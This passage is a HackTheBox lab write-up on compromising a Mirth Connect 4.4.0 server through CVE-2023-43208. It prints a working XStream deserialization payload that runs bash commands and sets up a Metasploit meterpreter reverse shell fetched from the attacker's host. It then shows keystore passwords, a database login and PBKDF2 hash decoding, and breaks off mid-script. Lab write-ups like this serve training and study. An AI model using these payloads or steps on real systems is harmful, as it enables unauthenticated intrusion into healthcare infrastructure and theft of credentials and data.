🎯 Machine Overview

Interpretor is an active HackTheBox machine that challenges players with real-world penetration testing scenarios. This machine focuses on careful enumeration, exploitation techniques, and creative privilege escalation paths. As this is an active HTB machine, this writeup will provide valuable insights into the methodology and approach used to compromise the system.


1 RECON

1.1 Port Scan

nmap -p- -sV -sC 10.129.5xxxxxx

Result:

PORT     STATE SERVICE  REASON  VERSION
22/tcp   open  ssh      syn-ack OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
|   256 07:eb:d1:b1:61:9a:6f:38:08:e0:1e:3e:5b:61:03:b9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDVuD7K78VPFJrRRqOF1sCo4+cr9vm+x+VG1KLHzsgeEp3WWH2MIzd0yi/6eSzNDprifXbxlBCdvIR/et0G0lKI=
|   256 fc:d5:7a:ca:8c:4f:c1:bd:c7:2f:3a:ef:e1:5e:99:0f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILAfcF/jsYtk8PnokOcYPpkfMdPrKcKdjel2yqgNEtU3
80/tcp   open  http     syn-ack Jetty
| http-methods:
|   Supported Methods: GET HEAD TRACE OPTIONS
|_  Potentially risky methods: TRACE
|_http-favicon: Unknown favicon MD5: 62BE2608829EE4917ACB671EF40D5688
|_http-title: Mirth Connect Administrator
443/tcp  open  ssl/http syn-ack Jetty
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mirth-connect
| Issuer: commonName=Mirth Connect Certificate Authority
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-19T12:50:05
| Not valid after:  2075-09-19T12:50:05
| MD5:   c251:9050:6882:4177:9dbc:c609:d325:dd54
| SHA-1: 3f2b:a7d8:5c81:9ecf:6e15:cb6a:fdc6:df02:8d9b:1179
| http-methods:
|   Supported Methods: GET HEAD TRACE OPTIONS
|_  Potentially risky methods: TRACE
|_http-title: Mirth Connect Administrator
6661/tcp open  unknown  syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Overview:

  • 22/tcp — SSH
  • 80/tcp — HTTP (Jetty → Mirth Connect Administrator)
  • 443/tcp — HTTPS (Jetty → Mirth Connect Administrator)
  • 6661/tcp — Needed for Mirth

1.2 Web Application

Mirth Connect webadmin interface: When exposed to the internet, it is frequently game over. Unlike typical web apps, Mirth’s real power resides in the desktop administrator client, not the web UI.


2 WEB

2.1 Mirth Connect

mirth-webpage

Mirth Connect (now NextGen Connect) is an enterprise healthcare integration engine — built for HL7 processing, message routing, transformation pipelines, database connectors, and embedded scripting. In practice, it’s a programmable middleware hub sitting at the center of hospital infrastructure.

2.1.1 Vulnerable Design

Java applications like this are risky by nature. Mirth processes healthcare messages through modular channels: Input → Transformer → Filters → Destinations

Internally, each target system is modeled as a “Patient”. At the core, it relies on the Java Transformer class to deserialize data into executable logic. Each step can execute:

  • JavaScript
  • Java code via interop
  • File operations
  • Network calls
  • Database queries

In other words, the platform is already capable of running arbitrary logic by design.

2.1.2 Java Web Start Descriptor (JNLP)

From the web admin portal, the green button downloads a configuration file used to launch the Mirth Connect Administrator client: the-javascript-loophole

<jnlp codebase="http://interpretor.htb:80" version="4.4.0">
    	
    <information>
        		
        <title>Mirth Connect Administrator 4.4.0</title>
        		
        <vendor>NextGen Healthcare</vendor>
        		
        <homepage href="http://www.nextgen.com"/>
        		
        <description>Open Source Healthcare Integration Engine</description>
        		
		
        <icon href="images/NG_MC_Icon_128x128.png"/>
        		
        <icon href="images/MirthConnect_Logo_WordMark_Big.png" kind="splash"/>
         
		
		
        <offline-allowed/>
        		
        <shortcut online="true">
                        
            <!-- put a shortcut on the desktop -->
                        
            <desktop/>
                        
            <!-- put shortcut in start menu too -->
                        
            <menu submenu="Mirth Connect"/>
                	
        </shortcut>
            	
	
    </information>
    	
	
    <security>
        		
        <all-permissions/>
        	
    </security>
    	
	
    <update check="timeout" policy="always"/>
    	
	
    <resources>
        		
        <j2se href="http://java.sun.com/products/autodl/j2se" java-vm-args="--add-modules=java.sql.rowset --add-exports=java.base/com.sun.crypto.provider=ALL-UNNAMED --add-exports=java.base/sun.security.provider=ALL-UNNAMED --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.lang.reflect=ALL-UNNAMED --add-opens=java.base/java.math=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.security=ALL-UNNAMED --add-opens=java.base/java.security.cert=ALL-UNNAMED --add-opens=java.base/java.text=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/sun.security.pkcs=ALL-UNNAMED --add-opens=java.base/sun.security.rsa=ALL-UNNAMED --add-opens=java.base/sun.security.x509=ALL-UNNAMED --add-opens=java.desktop/com.apple.eawt=ALL-UNNAMED --add-opens=java.desktop/com.apple.eio=ALL-UNNAMED --add-opens=java.desktop/java.awt=ALL-UNNAMED --add-opens=java.desktop/java.awt.color=ALL-UNNAMED --add-opens=java.desktop/java.awt.font=ALL-UNNAMED --add-opens=java.desktop/javax.swing=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED" max-heap-size="512m" version="1.9+"/>
        		
        <j2se href="http://java.sun.com/products/autodl/j2se" max-heap-size="512m" version="1.6+"/>
        	
        <jar download="eager" href="webstart/client-lib/mirth-client.jar" main="true" sha256="IHeDHNaFglz/afA4Osr3nllnqCMpsgo6RmrVTjbKBsA="/>
        <jar download="eager" href="webstart/client-lib/mirth-client-core.jar" sha256="Ms8xCKJF4OPd0YHeM0I+dPyfKB4sdsXHcQsubFBfvz4="/>
        <jar download="eager" href="webstart/client-lib/mirth-crypto.jar" sha256="3QGDVXdCJU/pevR+R0wnBGKnI6Ffuigbt4xNw8IOJKM="/>
        <jar download="eager" href="webstart/client-lib/mirth-vocab.jar" sha256="C20/n2aTWZFxY4x8iEBcrLWGzz5taUMTlWLezAcpCRs="/>
        <jar download="eager" href="webstart/client-lib/commons-lang3-3.9.jar" sha256="Vgwgrwq6WiuqsbpFY2oAq3y8dYHTsrQXc7BT8d4Bjmg="/>
        <jar download="eager" href="webstart/client-lib/jackson-core-2.11.3.jar" sha256="Sn93THoyv2dXoxnx/FGS4YJgW0bWpBuzLPUo2S2fsWw="/>
        <jar download="eager" href="webstart/client-lib/language_support.jar" sha256="sAzNPDx8Zcc+miVKCivSPaJC3fSCwgPE7y/tWM6f48A="/>
        <jar download="eager" href="webstart/client-lib/donkey-model.jar" sha256="rUOeInGLuiIRKZpUgosD/5Jeitea+mMtVfy/WGS8B1Q="/>
        <jar download="eager" href="webstart/client-lib/commons-configuration2-2.7.jar" sha256="QcDVizhsNICZPRi4XT7K+hBgm9KNFdRPLetbna1te80="/>
        <jar download="eager" href="webstart/client-lib/commons-codec-1.13.jar" sha256="rqMdWtimh21sVB/oZf/qwut33nVpNeXVPm74vfuVmKY="/>
        <jar download="eager" href="webstart/client-lib/jetty-util-9.4.44.v20210927.jar" sha256="FwOCGovjairWKH7Rg7r1knTLOnid4R9I0M0EbsjNJ7s="/>
        <jar download="eager" href="webstart/client-lib/log4j-1.2-api-2.17.2.jar" sha256="4Gi6JmmLeoPW/o6DYZMFl8zZoyZIHZ//sPJP27A7AVY="/>
        <jar download="eager" href="webstart/client-lib/javax.annotation-api-1.3.jar" sha256="B9B2My7V8CSIJT6+VqrdC2qTKlHBi5VQtNEcFTDdiI8="/>
        <jar download="eager" href="webstart/client-lib/hk2-locator-2.4.0-b31.jar" sha256="OTY93Favv8bFowgge5fv/nizGE2Vhp7IATYrVwNs6wI="/>
        <jar download="eager" href="webstart/client-lib/velocity-tools-generic-3.0.jar" sha256="ItFZhaj2pSWqreMV0hiT2hpN9Es6wxznasfNlgwomEY="/>
        <jar download="eager" href="webstart/client-lib/mimepull-1.9.7.jar" sha256="IR3nxpVPJFHkB7rqiX14vBJbeg3kLStX30X9XiIgh98="/>
        <jar download="eager" href="webstart/client-lib/zip4j_1.3.3.jar" sha256="Nq0nH85RbGL9D3KOlo1UIciuuhJo75yL4CpSakYXRn0="/>
        <jar download="eager" href="webstart/client-lib/commons-io-2.6.jar" sha256="ETnAc6KUHMebRMv0FKWTlUF7Et8vHlMw3uagiYOQlag="/>
        <jar download="eager" href="webstart/client-lib/commons-collections4-4.4.jar" sha256="nW5g92kH9CucRW1+B3OI4oTvsICWwwd/7hkkbMFdIWc="/>
        <jar download="eager" href="webstart/client-lib/rsyntaxtextarea-2.5.6.jar" sha256="5AwU0m/gEfep5vsTDox3h+iFRielROm8Ee3aD6vTKTQ="/>
        <jar download="eager" href="webstart/client-lib/quartz-all-2.1.7.jar" sha256="s8iEI5/GpBxXvE6bF76gPuzeIsc6H/+6ybO7RIDPxGI="/>
        <jar download="eager" href="webstart/client-lib/commons-text-1.10.0.jar" sha256="mkbZGbj6rJ+DfxfzXg9K71+fjTzg5fKS4q+5hKE6FXY="/>
        <jar download="eager" href="webstart/client-lib/autocomplete-2.5.4.jar" sha256="e4ZfCl5M9ElresOdHO30kzKqv79SxvpW3hWyxsVEK3w="/>
        <jar download="eager" href="webstart/client-lib/utils-2.15.28.jar" sha256="F2h3NoUjlAcsMb7Tzr/1SnHQDE3jLNnk/94nym9ERV4="/>
        <jar download="eager" href="webstart/client-lib/xpp3-1.1.4c.jar" sha256="sRmgN+Q81MVgJ+0eJaPPWatm39tYtHFRx6XxgvtLkec="/>
        <jar download="eager" href="webstart/client-lib/libphonenumber-8.12.50.jar" sha256="tjWFlc1nGTCQKOUgi/w7sWHGmTpeoerafoRZeOM4Q5o="/>
        <jar download="eager" href="webstart/client-lib/log4j-core-2.17.2.jar" sha256="fylUDk4s8265Vk+Y/jvkLsW8x8e5VjJUjTS1v8VEkrs="/>
        <jar download="eager" href="webstart/client-lib/jersey-proxy-client-2.22.1.jar" sha256="kCMvyNtvYX9sgjMt5OnZ2gJ163vYkDhLYoV/xpUs3Co="/>
        <jar download="eager" href="webstart/client-lib/commons-vfs2-2.1.jar" sha256="AeG82Lit+p/45dInSR8cxRZ8Eb2LmIQelpPHRGEG3Fg="/>
        <jar download="eager" href="webstart/client-lib/commons-logging-1.2.jar" sha256="KBnbQ2TXK5shS9/peQgDFVll50w6kAMfBVzKVTgfMV4="/>
        <jar download="eager" href="webstart/client-lib/swagger-annotations-2.0.10.jar" sha256="obRzCEphaiLShGrWm3d1fEGpKaTwmsAN7RVwNpc4ybg="/>
        <jar download="eager" href="webstart/client-lib/xstream-1.4.19.jar" sha256="An1TfdUt/dyRZWO1O4L3OB8/I2JYJnHX/7u7e07lrfs="/>
        <jar download="eager" href="webstart/client-lib/hapi-structures-v28-2.3.jar" sha256="LIlghnHInyIiHFipUqQEqo3w3/JHwBbVXKNhtH3vSpw="/>
        <jar download="eager" href="webstart/client-lib/looks-2.3.1.jar" sha256="YAGKqTQk1/doNoOzJ1me0F2OBO7bRAEa052xk2Y4Qxc="/>
        <jar download="eager" href="webstart/client-lib/jaxb-runtime-2.4.0-b180725.0644.jar" sha256="p+osvQhxLrgqF4woPOlD78SuhWAGS74O3nGOq2lsYt8="/>
        <jar download="eager" href="webstart/client-lib/jcifs-ng-2.1.8.jar" sha256="1LMOZ6bPn/yHjkrqho3k+KVvs0hCENbK4sh0lA7AefE="/>
        <jar download="eager" href="webstart/client-lib/swingx-core-1.6.2.jar" sha256="Krugs5yfMGY+hJP2YtVjQzk2fEBIDqKNL+Mpc0zs93E="/>
        <jar download="eager" href="webstart/client-lib/hapi-structures-v23-2.3.jar" sha256="JlCBJVERFzAiyp4INZU5rdaQqHJRzlusNXYxwvVbNgA="/>
        <jar download="eager" href="webstart/client-lib/hapi-structures-v21-2.3.jar" sha256="SWz11YnwDV8se0huhvnwPbSN3zb+52VnIXrCbxj71os="/>
        <jar download="eager" href="webstart/client-lib/bcutil-jdk18on-171.jar" sha256="/jd5If5JVbQraUTgVMUDOsziWVrAdupKbC2YtCaBEYU="/>
        <jar download="eager" href="webstart/client-lib/openjfx.jar" sha256="xXKQTb9rtpA+xbbrJv41SeGQsfBLK5od/tjYzSBEfqI="/>
        <jar download="eager" href="webstart/client-lib/hapi-base-2.3.jar" sha256="XgloOIjOa0PPHD6YRCtQYz8Sh1wOXd4qZwT8rP0NH2g="/>
        <jar download="eager" href="webstart/client-lib/jersey-media-multipart-2.22.1.jar" sha256="NI9cZ1099RlbB1UDeDeqxG+JDk1XL/5QpulQF76VM0E="/>
        <jar download="eager" href="webstart/client-lib/httpcore-4.4.13.jar" sha256="7GMATM3FXKnnKJokElaJxSUznUY4lI0nbKKo+XW/Amk="/>
        <jar download="eager" href="webstart/client-lib/xercesImpl-2.9.1.jar" sha256="35zfeAILzwjhdB7CmbVNu/IgqdWm92le919CD0vT3Go="/>
        <jar download="eager" href="webstart/client-lib/javax.activation-1.2.0.jar" sha256="rV9iEYBiiE0cU0+2Dd3Mqihmk/ykGK62+YGf/7Hmofo="/>
        <jar download="eager" href="webstart/client-lib/hk2-api-2.4.0-b31.jar" sha256="Yd0V2fCUvbtCeWsKybYe52IiKr0pcWUXYG2r1qRCKVo="/>
        <jar download="eager" href="webstart/client-lib/commons-compress-1.17.jar" sha256="vdHWwrCXRfPZawbulPFXxx/9elZghqPNsYD9Sq/EiRU="/>
        <jar download="eager" href="webstart/client-lib/staxon-1.3.jar" sha256="jeWRqRwl0xXZzYCV4hHI9L8Ce/sy9mNVsg1LmzrcH0w="/>
        <jar download="eager" href="webstart/client-lib/hapi-structures-v231-2.3.jar" sha256="Zy3A3/aqpUxulbTzSLOfFS/zskDaRtHqcyktQ9Ppl8U="/>
        <jar download="eager" href="webstart/client-lib/jackson-databind-2.11.3.jar" sha256="HdpB6UnUciJ4xp3AApqF3SD0DC7XceIsoqy+nvtRO/k="/>
        <jar download="eager" href="webstart/client-lib/jersey-guava-2.22.1.jar" sha256="IBqA2V9KW8RRbGf1gi83X1yPbPevBUWvSvSLAsBT/+8="/>
        <jar download="eager" href="webstart/client-lib/joda-time-2.9.9.jar" sha256="lbeoqEup9KalPvZCzypvbbIkaIWi2jlKfSpHlQIt1rw="/>
        <jar download="eager" href="webstart/client-lib/velocity-engine-core-2.2.jar" sha256="hLoIAPaQME4UpUhH4JM/BaRE1XU/aAsKWpO/a7QtlqM="/>
        <jar download="eager" href="webstart/client-lib/javax.inject-2.4.0-b31.jar" sha256="VMorIrzeWoo+lDm5JOnVK0w4Cshu5wEmVgjP6lkqqDw="/>
        <jar download="eager" href="webstart/client-lib/jackson-annotations-2.11.3.jar" sha256="DoOzxry+xCjH7dTFsmeOBqnf6tp/MADddqPAc74EbAw="/>
        <jar download="eager" href="webstart/client-lib/slf4j-api-1.7.30.jar" sha256="4odF1co8Wo88h4Pmg/GzGh2SKMnnn0Yi04e0Og0Rg6o="/>
        <jar download="eager" href="webstart/client-lib/commons-pool2-2.3.jar" sha256="APdgYnfApxJ1KQ+FlfuLhcSYL1J+YfM2gWQG52hhogQ="/>
        <jar download="eager" href="webstart/client-lib/javassist-3.26.0-GA.jar" sha256="CIYZWNSYwYzGL6Br67AC6i0neHBvi2JOpCjRjmJGFI0="/>
        <jar download="eager" href="webstart/client-lib/guava-28.2-jre.jar" sha256="SyoNyKpmdiFudyjFaul5lMleraSD8E85voyrCpzf9dY="/>
        <jar download="eager" href="webstart/client-lib/jaxb-api-2.4.0-b180725.0427.jar" sha256="l9sDNL727nZkvNzCarcpq7jd8VcMu3ss6FNOSG57/NQ="/>
        <jar download="eager" href="webstart/client-lib/httpmime-4.5.13.jar" sha256="7R/v9tFfvVFBimz7msrZ1B6Zfq5bGQqFDkyYFterJMM="/>
        <jar download="eager" href="webstart/client-lib/wizard.jar" sha256="7OYEhgqNU7QJqK9bHGJNJqxFCi4oWVlF8XtYwBaPdOo="/>
        <jar download="eager" href="webstart/client-lib/hapi-structures-v22-2.3.jar" sha256="OjQVkkOwGi+iGVkPv9q06zuiHw6ER+iUMlZJJHc35ZA="/>
        <jar download="eager" href="webstart/client-lib/miglayout-swing-4.2.jar" sha256="Mx8CMy2FiaUHSLJB4nSirw4XWrQiuzZuHbTK385bnIk="/>
        <jar download="eager" href="webstart/client-lib/hapi-structures-v25-2.3.jar" sha256="9SblQqKV9egD7z7obYD6BnY/nTXvli5+uPkLYDvsYAs="/>
        <jar download="eager" href="webstart/client-lib/reflections-0.9.10.jar" sha256="IPDk2Q6OmWaPvh4hRXVM0PYCrWryNVd0aaiufWFahNk="/>
        <jar download="eager" href="webstart/client-lib/javaparser-1.0.8.jar" sha256="cUyZFy6pW06C7BeXIVnQH1jSDjn+D6NOvFLdxZm0v3U="/>
        <jar download="eager" href="webstart/client-lib/miglayout-core-4.2.jar" sha256="0ajHMEw8GsCWLq1gSh9zhJp+FRGHhq//sRO2RTz9EtU="/>
        <jar download="eager" href="webstart/client-lib/bcprov-ext-jdk18on-171.jar" sha256="/1v9cPkedM2dS61zfPb1QRczEb2XjDx8IxQ+vX3EgqM="/>
        <jar download="eager" href="webstart/client-lib/jersey-common-2.22.1.jar" sha256="w1a3DUxOzMnN3ShUe3BgqKq+LQZuRXbjf7XPGAGSyH4="/>
        <jar download="eager" href="webstart/client-lib/hapi-structures-v26-2.3.jar" sha256="/sdcfbvvni4u7iJ7C4fAoGuqBV3SKt+oaeaUmrz7soc="/>
        <jar download="eager" href="webstart/client-lib/javax.ws.rs-api-2.0.1.jar" sha256="1anYrmLH6XVLuL6UdyHChnVC63G88ZN6ksYVKDHrwWY="/>
        <jar download="eager" href="webstart/client-lib/rhino-1.7.13.jar" sha256="9YLjcaeQjbLFrlnNeNAPPFyO7GwkWeoivlB+cHf/LGw="/>
        <jar download="eager" href="webstart/client-lib/hapi-structures-v251-2.3.jar" sha256="PKc8cQQrOWODAnNyWfbj0YGGoZlR2+ekBnToOn9XIp4="/>
        <jar download="eager" href="webstart/client-lib/bcpkix-jdk18on-171.jar" sha256="skuBILkn+PcpJuDP/M9di3Nu3hlq93rYuSSgS2/ovtQ="/>
        <jar download="eager" href="webstart/client-lib/javax.mail-1.5.0.jar" sha256="flDlXMAW8Rl7/D5PRT6aziJ5+BFLgCkly4USmIUJnj0="/>
        <jar download="eager" href="webstart/client-lib/slf4j-log4j12-1.7.30.jar" sha256="7G71CIScs6JqQn95E5IH01sMkDdrP/BDQgCS9ZwmIvE="/>
        <jar download="eager" href="webstart/client-lib/jai_imageio.jar" sha256="Sv+7VsN2v7lCseg/10Hfl+25Z17DIjbBFS5LW8uSCzc="/>
        <jar download="eager" href="webstart/client-lib/javax.activation-api-1.2.0.jar" sha256="v3ndkHoaiEwiTJpm9177HFQztgaZC5VfN9B2jdrkhFs="/>
        <jar download="eager" href="webstart/client-lib/hapi-structures-v27-2.3.jar" sha256="fJ668/E7otWgs7SA1jHiiCpKHSHAiouVPKS3IO1Zcq4="/>
        <jar download="eager" href="webstart/client-lib/userutil-sources.jar" sha256="1BGr/v2Og/FH2XYS244rEs7fsLEu1BmKQmSpWHRn05U="/>
        <jar download="eager" href="webstart/client-lib/bcprov-jdk18on-171.jar" sha256="l7kndUKXP0Boq6mlKee5Qo78WjkJEH2nDYp/+PbhVkI="/>
        <jar download="eager" href="webstart/client-lib/hapi-structures-v281-2.3.jar" sha256="4s3VMiZqi8XRR8R2ojsgD9sALwtqw4wnSRa0d0YxYtU="/>
        <jar download="eager" href="webstart/client-lib/jersey-client-2.22.1.jar" sha256="gmAUfqtAN3AeddIKF40h1pvUB10Qzdy3+Z6zWKXueTY="/>
        <jar download="eager" href="webstart/client-lib/log4j-api-2.17.2.jar" sha256="Rpvu+JLDk4rkoNnRr8C9xI57yHVBwTB0tvAL8zSi5cY="/>
        <jar download="eager" href="webstart/client-lib/httpclient-4.5.13.jar" sha256="G87KYCKVy/05s9g44w8cILxtugjhab6FyoM24Xcov9M="/>
        <jar download="eager" href="webstart/client-lib/istack-commons-runtime-3.0.6.jar" sha256="r7Pdb2yYKzY3TR1m8Nq8nR52JTeX9WjlGYZWwvQQMrU="/>
        <jar download="eager" href="webstart/client-lib/hapi-structures-v24-2.3.jar" sha256="m6ulzJ/p9GGit/n3kid3O2VDZSSGdSgzltNd1UVGFuw="/>
        <jar download="eager" href="webstart/client-lib/commons-lang-2.6.jar" sha256="NKmzkdAArMvPlzkusZAE3/wiKSk1XsdzJONkUQvG8dk="/>
        <jar download="eager" href="webstart/client-lib/commons-beanutils-1.9.3.jar" sha256="rpgEMWYeRxs6wfLVCeOCrgm2CWo+QdSNPxLK05zWz9k="/>
        <jar download="eager" href="webstart/client-lib/regions-2.15.28.jar" sha256="DO+3VI3z+GW/FSgxHWsjJ6ddn3FedIBCeRkdvjUSWc0="/>
        <jar download="eager" href="webstart/client-lib/hk2-utils-2.4.0-b31.jar" sha256="1dSEKIqf2Ocip0f+5elBZJxi6UnRoaLg5RsfdzNluTI="/>
        <extension href="webstart/extensions/scriptfilestep.jnlp"/>
        <extension href="webstart/extensions/textviewer.jnlp"/>
        <extension href="webstart/extensions/dicomviewer.jnlp"/>
        <extension href="webstart/extensions/js.jnlp"/>
        <extension href="webstart/extensions/jdbc.jnlp"/>
        <extension href="webstart/extensions/mapper.jnlp"/>
        <extension href="webstart/extensions/directoryresource.jnlp"/>
        <extension href="webstart/extensions/datapruner.jnlp"/>
        <extension href="webstart/extensions/javascriptrule.jnlp"/>
        <extension href="webstart/extensions/datatype-xml.jnlp"/>
        <extension href="webstart/extensions/datatype-ncpdp.jnlp"/>
        <extension href="webstart/extensions/jms.jnlp"/>
        <extension href="webstart/extensions/datatype-json.jnlp"/>
        <extension href="webstart/extensions/xsltstep.jnlp"/>
        <extension href="webstart/extensions/file.jnlp"/>
        <extension href="webstart/extensions/scriptfilerule.jnlp"/>
        <extension href="webstart/extensions/messagebuilder.jnlp"/>
        <extension href="webstart/extensions/datatype-dicom.jnlp"/>
        <extension href="webstart/extensions/serverlog.jnlp"/>
        <extension href="webstart/extensions/datatype-hl7v3.jnlp"/>
        <extension href="webstart/extensions/datatype-hl7v2.jnlp"/>
        <extension href="webstart/extensions/ws.jnlp"/>
        <extension href="webstart/extensions/javascriptstep.jnlp"/>
        <extension href="webstart/extensions/dashboardstatus.jnlp"/>
        <extension href="webstart/extensions/datatype-raw.jnlp"/>
        <extension href="webstart/extensions/tcp.jnlp"/>
        <extension href="webstart/extensions/datatype-edi.jnlp"/>
        <extension href="webstart/extensions/smtp.jnlp"/>
        <extension href="webstart/extensions/globalmapviewer.jnlp"/>
        <extension href="webstart/extensions/httpauth.jnlp"/>
        <extension href="webstart/extensions/dicom.jnlp"/>
        <extension href="webstart/extensions/imageviewer.jnlp"/>
        <extension href="webstart/extensions/mllpmode.jnlp"/>
        <extension href="webstart/extensions/pdfviewer.jnlp"/>
        <extension href="webstart/extensions/destinationsetfilter.jnlp"/>
        <extension href="webstart/extensions/vm.jnlp"/>
        <extension href="webstart/extensions/http.jnlp"/>
        <extension href="webstart/extensions/doc.jnlp"/>
        <extension href="webstart/extensions/rulebuilder.jnlp"/>
        <extension href="webstart/extensions/datatype-delimited.jnlp"/>
    </resources>
    	
	
    <application-desc main-class="com.mirth.connect.client.ui.Mirth">
        <argument>https://interpretor.htb:443</argument>
        <argument>4.4.0</argument>
    </application-desc>
    
</jnlp>

This Java-based application uses XML descriptors as launch initializers. More importantly, the file exposes precise fingerprints: Target = NextGen (Mirth) Connect 4.4.0.

2.1.3 The CVE Hunt

I went on a little CVE hunt and it was great cve-search

We got something worth mentioning and that was the CVE-2023-43208 confirmation-of-the-cve

2.2 CVE-2023-43208

Version 4.4.0 is affected by a critical Java deserialization flaw originally tracked as CVE-2023-37679. An incomplete fix later introduced a bypass, assigned CVE-2023-43208.

2.2.1 Deserialization RCE

CVE-2023-37679 is an unauthenticated remote code execution vulnerability caused by unsafe Java deserialization of attacker-controlled input exposed through an HTTP endpoint. Mirth Connect provides REST APIs that accept XML payloads. Requests with Content-Type: application/xml are handled by a global JAX-RS provider, XmlMessageBodyReader, which deserializes the request body into Java objects:

@Provider
@Singleton
@Consumes(MediaType.APPLICATION_XML)
public class XmlMessageBodyReader implements MessageBodyReader<Object> {
    @Override
    public Object readFrom(Class<Object> type, Type genericType,
                           Annotation[] annotations, MediaType mediaType,
                           MultivaluedMap<String,String> headers,
                           InputStream entityStream) throws IOException {
        return ObjectXMLSerializer.getInstance()
                .deserialize(IOUtils.toString(entityStream, "UTF-8"), type);
    }
}

Deserialization is performed by ObjectXMLSerializer, which relies on the XStream library. Because XStream rebuilds object graphs directly from XML, attacker input can instantiate arbitrary classes during unmarshalling, enabling gadget-chain execution.

Authentication is normally enforced by the base class MirthServlet via initLogin(). However, several API servlets — including UserServlet, SystemServlet, and ConfigurationServlet — explicitly disable this protection by calling the parent constructor with initLogin=false:

public class UserServlet extends MirthServlet {
    public UserServlet(@Context HttpServletRequest request,
                       @Context SecurityContext sc) {
        super(request, sc, false);   // auth disabled here
    }
}

Attack flow: Unauthenticated XML request → XmlMessageBodyReader intercepts request → ObjectXMLSerializer → XStream unmarshalling → Gadget chain executes during deserialization → Remote code execution as Mirth service user

info

Example malicious XML payload:

<sorted-set>
    <string>ABCD</string>
    <dynamic-proxy>
      <interface>java.lang.Comparable</interface>
      <handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
        <target class="java.lang.ProcessBuilder">
          <command>
            <string>bash</string>
            <string> -c</string>
            <string>{cmd}</string>
          </command>
        </target>
        <methodName>start</methodName>
        <eventTypes/>
      </handler>
    </dynamic-proxy>
</sorted-set>

2.2.2 Metasploit

Start MSF and load the exploit:

[msf](Jobs:0 Agents:0) >> use exploit/multi/http/mirth_connect_cve_2023_43208
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/http/mirth_connect_cve_2023_43208) >> options

Module options (exploit/multi/http/mirth_connect_cve_2023_43208):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8443             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant als
                                              o Python ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           10.114.129.161   yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      xGHfNfTg         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Unix Command



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(multi/http/mirth_connect_cve_2023_43208) >>

Configure and run:

msf exploit(...) > set RHOST interpreter.htb
msf exploit(...) > set RPORT 443
msf exploit(...) > set LHOST tun0
msf exploit(...) > set LPORT 60001
msf exploit(...) > set FETCH_COMMAND wget
msf exploit(...) > run

meterpreter


3 USER

3.1 Mirth Internal

3.1.1 Mirth Properties

Locate the configuration file: <MIRTH_HOME>/conf/mirth.properties

# Mirth Connect configuration file
dir.appdata = /var/lib/mirthconnect
dir.tempdata = ${dir.appdata}/temp

3.1.2 Keystore Credentials

The properties file contains keystore passwords:

keystore.path = /var/lib/mirthconnect/keystore.jks
keystore.storepass = 5GbU5HGTOOgE
keystore.keypass = tAuJfQeXdnPw

conf

3.1.3 MySQL

database-password

Access the database: mysql -u mirthdb -p mc_bdd_prod

3.2 Mirth Password Hashes

Mirth uses PBKDF2WithHmacSHA256 for password hashing.

  • Salt Size: 8 bytes
  • Iterations: 600,000
  • Key Size: 256 bits

Example hash from DB: u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w==

Decoding the hash:

$ echo 'u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w==' | base64 -d | xxd -g1
00000000: bb ff 8b 04 13 94 9d a7 62 c8 50 6c 30 ea 08 0c  ........b.Pl0...
00000010: f2 db 51 1d 2b 93 9f 64 12 43 d4 d7 b8 ad 76 b5  ..Q.+..d.C....v.
00000020: 56 03 f9 0b 32 dd f0 fb                          V...2...

Splitting with Python:

import base64  
b = base64.b64decode("u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w==")  
print("salt:", b[:8].hex())  
print("dk :", b[8:].hex())

Cracking with Python:

import base64
import hashlib
from pwn import log

